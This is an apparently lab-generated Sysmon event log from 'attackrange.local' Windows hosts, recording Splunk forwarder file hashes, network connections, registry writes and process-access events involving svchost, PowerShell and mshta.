08:05:25.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=910508B63668073BF335F9C00B3EDCA0,SHA256=94D04E7C5401139A126C3A99DD30B0408AE322211EAFE9A6959D59950EB0CF36,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084050Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:26.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4906EA6CBDC09759F24D8DB8187825B6,SHA256=F1E6F3D3C0FD5A8920796E5E3A4459CA91CBCC603F6CB628F6C40BD25CC8488A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108589Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:26.485{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C8A67C7644EF485CFF4664619B7A1F8F,SHA256=D2F13C8005C42E8D53516594C6B3863724199C341ED0451AD0D43E0581F434CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084051Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:27.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA7D24C46D5E78238D152F148802A2BE,SHA256=03388A3FCE23096A4C0E73F6F0B33C7CCDC71A713A4B3550E6985307832A7D48,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108590Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:27.490{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=361EFD6635EEF244219B1F92CBC6DE8D,SHA256=F5832E5B38A08C1333B8CB395A46EBA5665E19F68C9C2ABB41D0724BAE9B6605,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084052Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:28.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B61B527C25A479B36238A4A4F84069A0,SHA256=F37591F1BAB38242454DA619D86083F601195D5CCE17C45D0F323AC6297CE0C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108591Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:28.506{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88EB704E83D893AE742A277FD628F15A,SHA256=3473A5F57BAB91500FF255AE0F78CB03EE5C378BE667DBD57BA1BCED3BB1225A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000108599Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:27.316{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51978-false10.0.1.12-8000- 23542300x8000000000000000108598Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:29.536{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AF27F0489860B6156835D640AA97AFB0,SHA256=E6CEA6774640EC968E40C8490B09F18D4B7870043C68E774C40047A93CA91893,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084054Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:29.925{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000084053Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:29.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BFB8D2DAF6327A6DB1C1F293C191D322,SHA256=6DA02BD35C790CF3878F909A0CDB042C6AD34E39431A1A116104AC076D44459E,IMPHASH=00000000000000000000000000000000falsetrue 13241300x8000000000000000108597Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:05:29.052{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x8000000000000000108596Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:05:29.052{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x8000000000000000108595Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:05:29.052{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x8000000000000000108594Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:05:29.052{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d7b8f6-0x987d3d38) 13241300x8000000000000000108593Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:05:29.052{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x8000000000000000108592Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-SetValue2021-10-04 08:05:29.052{58E9C193-ACA7-615A-1200-00000000FC01}764C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 354300x800000000000000084056Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:27.690{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50212-false10.0.1.12-8000- 23542300x800000000000000084055Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:30.722{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B032DA63D49702BF492D35DB89B773D,SHA256=D0F3B8A9EC668C900389B44325DBEE55066ACEEC9579B304841B7809EDFFD50C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000108612Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.551{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE3CB0233413A36BA6EC02497163EA23,SHA256=02891E879437C63D3A5B68C4E33B56982645086ADE01C3340A16A5F2AE749914,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000108611Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108610Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2F02-00000000FC01}7796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108609Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108608Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108607Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108606Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2902-00000000FC01}7392C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108605Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2C02-00000000FC01}7508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108604Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2B02-00000000FC01}7500C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108603Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108602Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108601Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2A02-00000000FC01}7416C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000108600Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:05:30.504{58E9C193-ACA7-615A-0D00-00000000FC01}8966684C:\Windows\system32\svchost.exe{58E9C193-B461-615A-2802-00000000FC01}7364C:\Windows\system32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084084Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B5CB-615A-AC01-00000000FD01}3608C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084083Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084082Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084081Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084080Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084079Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084078Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084077Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084076Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084075Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:05:31.816{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000084074Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 